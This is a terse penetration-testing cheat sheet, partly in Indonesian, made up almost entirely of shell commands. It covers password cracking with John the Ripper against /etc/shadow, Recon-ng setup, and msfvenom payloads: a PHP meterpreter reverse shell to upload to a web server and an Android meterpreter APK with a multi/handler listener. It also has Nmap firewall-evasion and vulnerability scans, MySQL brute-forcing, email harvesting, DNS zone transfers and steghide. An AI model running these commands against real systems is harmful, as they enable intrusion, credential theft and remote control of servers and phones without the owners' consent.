John the Ripper
sh
zip2john test.zipsh
zip2john test.zip > hash.txtsh
john -format:zip hash.txtsh
john hash.txtsh
john /etc/shadowRecon-ng
Recon-Web Required
sh
pip install flasksh
pip install dicttoxmlsh
pip install unicodecsvsh
pip install xlsxwritersh
marketplace install allLihat daftar list
sh
keys listMenambahkan api
sh
keys add shodan_api <YOUR_API>Menambahkan workspace
sh
workspaces create tesCek Daftar workspace
sh
workspaces listPindah workspace
sh
workspaces load <NAMA_WORKSPACE>Menambahkan domain
sh
db insert domainsMelihat daftar domain
sh
show domainsMelihat Daftar Module
sh
modules searchInstall Module
sh
marketplace install <NAMA_MODULE>Load module
sh
modules load <NAMA_MODULE>Module Shodan
recon/locations-pushpins/shodanModule host
recon/hosts-hosts/resolve
recon/hosts-hosts/ipstackModule domains-contacts
recon/domains-contacts/whois_pocs
recon/domains-contacts/pgp_searchModule domains-hosts
recon/domains-hosts/bing_domain_web
recon/domains-hosts/brute_hostsModule Interesting
discovery/info_disclosure/interesting_filesModule Web
recon/domains-hosts/builtwith
recon/domains-hosts/google_site_webRecord
sh
script record PATHsh
script record stopMenjalankan Record
sh
./recon-ng -r PATHMenyimpan output menggunakan spool
sh
spool startsh
spool stopMsfvenom & Msfconsole
File Upload
sh
msfvenom -p php/meterpreter/reverse_tcp lhost=<IP> lport=4444 rawMasuk Msfconsole
sh
msfconsolesh
use exploit/multi/handlersh
set payload php/meterpreter/reverse_tcpsh
set lhost <IP>sh
set lport 4444sh
exploitMasuk Browser jalankan file php yg berhasil di upload tadi di URL Remote Android
sh
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.215 LPORT=4444 AndroidMeterpreterDebug=true AndroidWakelock=true R > /var/www/html/new.apksh
sudo service postgresql startsh
msfconsolesh
use exploit/multi/handlersh
set payload android/meterpreter/reverse_tcpsh
set lhost 192.168.x.xsh
exploitNmap
Firewall Evasion (Decoys,MTU & Fragmentation)
sh
nmap -sS -sV -F -D RND:3 nmap.scanme.orgsh
nmap -sS -sV -F -f -D 127.0.0.1 nmap.scanme.orgsh
nmap -sS -sV -F -f --send-eth -D 127.0.0.1 nmap.scanme.orgsh
nmap -sS -sV -F --mtu 16,24,32 -D 127.0.0.1 nmap.scanme.orgsh
nmap -sS -sV -F --mtu 16 --send-eth -D 127.0.0.1 nmap.scanme.orgScan Timing Performance
scan timing
sh
nmap -sS -p21-80 -T1 nmap.scanme.orgsh
nmap -Pn -sS -p21-80 -T1 nmap.scanme.orgparallelism
sh
nmap -sS -p21-433 --min-parallelism 10 nmap.scanme.orgsh
nmap -sS -p21-433 --max-parallelism 1 nmap.scanme.orghost group sizes
sh
nmap -sS -F --min-hostgroup 30 127.0.0.1/24sh
nmap -sS -F --max-hostgroup 5 127.0.0.1/24host timeout
sh
nmap -Pn -p- 127.0.0.1 --host-timeout 30sscan delay
sh
nmap -sT --scan-delay 5s nmap.scanme.orgpacket rate
sh
nmap -sT --min-rate 20 nmap.scanme.orgsh
nmap -sT --max-rate 2 nmap.scanme.orgNmap Scripting Engine (NSE)
sh
ls -al /usr/share/nmap/scripts/sh
ls -al /usr/share/nmap/scripts/ | grep -e "http"sh
sudo nmap --script-updatedbsh
nmap -p 21 --script ftp-anon 127.0.0.1sh
nmap -p 21 --script ftp-anon,ftp-vsftpd-backdoor 127.0.0.1sh
nmap -p 21 --script "ftp-*" 127.0.0.1Banner Grabbing
sh
sudo nmap -p22,80 --script banner 127.0.0.1sh
sudo nmap -F -T4 --script banner 127.0.0.1FTP Enumeration
sh
sudo nmap -sS --script ftp-anon,stp-syst,tftp-enum,ftp-vsftpd-backdoor 127.0.0.1DNS Enumeration
sh
sudo nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=zonetransfer.me -p 53 -Pn $(dig +short zonetransfer.me NS | head -1)sh
sudo nmap --script dns-zone-transfer --script-args dns-zone-transfer.server=nsztml.digi.ninja.dns-zone-transfer.port=53,dns-zone-transfer.domain=zonatransfer.mesh
sudo nmap -Pn --script dns-brute --script-args dns-brute.threads=5,dns-brute.hostlist=/usr/share/wordlist/Seclists/Discovery/DNS/fierce-hostlist.txt zonatransfer.meSMTP Enumeration
sh
sudo nmap -p25 --script smtp-commands 127.0.0.1sh
sudo nmap -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} 127.0.0.1sh
nmap -p25 --script smtp-open-relay 127.0.0.1sh
sudo nmap -p25 --script smtp-vuln-cve2011-1720 127.0.0.1HTTP Enumeration - Detecting HTTP Methods
sh
sudo nmap -Pn -sV -p 80 -T4 --script http-methods --script-args http-methods.test=all nmap.scanme.orgHTTP Enumeration -Finding Hidden Files and Directories
sh
sudo nmap -sV -p 80 --script http-enum 127.0.0.1HTTP Enumeration - WAF Detection and Fingerprinting
sh
sudo nmap -Pn -p 80 --script http-waf-detect 127.0.0.1sh
sudo nmap -Pn -p 80 --script http-waf-detect,http-waf-figerprint 127.0.0.1SMB Enumeration
sh
sudo nmap -p 445 -script smb-os-discovery 127.0.0.1sh
sudo nmap -p 445 -script smb-enum-shares 127.0.0.1sh
sudo nmap -p 445 -script smb-enum-users 127.0.0.1 -dsh
sudo nmap -p 445 -script smb-protokols 127.0.0.1sh
sudo nmap -p 445 -script smb-double-pulsar-backdoor 127.0.0.1sh
sudo nmap -p 445 -script smb-vuln-ms17-010 127.0.0.1MySQL Enumeration
sh
nmap -p 3306 --script mysql-info 127.0.0.1sh
nmap -p 3306 --script mysql-enum 127.0.0.1sh
sudo nmap -p 3306 --script mysql-empty-password 127.0.0.1sh
nmap -T4 -p 3306 --script mysql-brute --script-args mysql-brute.threads=100 127.0.0.1Vulnerability Scanning With Nmap
sh
sudo nmap -sV -p21-8080 --script vulners 127.0.0.1Scan for network vulnerabilities
sh
sudo nmap --script nmap-vulners -sV 192.168.x.xOperating System Detection
sh
sudo nmap -O 127.0.0.1sh
sudo nmap -O --osscan-guess 127.0.0.1Reconnaissance
Finding e-mail
sh
sudo theHarvester -d google.com -l 500 -b goole.comsh
sudo theHarvester -d google.com -l 500 -b allClone Website
sh
httrackICMP Reconnaissane
sh
fping -asg 127.0.0.1/24DNS Reconnaissane with dig
sh
dig www.x.comsh
dig -t ns www.x.comDNS target identification
sh
fierce -dns www.x.comDNS Enumerating with host
sh
sudo host -a google.comsh
sudo host -t ns google.comsh
sudo host -t mx google.comsh
sudo host -l google.com ns1.google.comDNS Enumerating with Dnsrecon
sh
sudo dnsrecon -d google.comReverse lookups
sh
sudo dnsrecon -r x.x.x.00-x.x.x.50Zone transfer
sh
sudo dnsrecon -d google.com -aDNS Enumerating with Dnsenum
sh
sudo dnsenum google.comBrute-force
sh
sudo dnsenum -f /usr/share/wordlists/subdomains/subdomains_popular_1000 -r google.comSteghide
Install
sh
sudo apt install steghidecara pakai Untuk memasukan filenya
sh
steghide embed -cf cvr.jpg -ef emb.txtuntuk extraknya
sh
steghide extract -sf stg.jpgCompress and protect folder
encrypt
sh
tar -cz namaDir | openssl enc -aes-256-cbc -salt -out namaDir.tar.gz.encsh
mv namaDir.tar.gz.enc namaDir.tar.gz.enc.tar.gzdecrypt
sh
openssl enc -aes-256-cbc -d -in namaDir.tar.gz.enc.tar.gz | tar -xz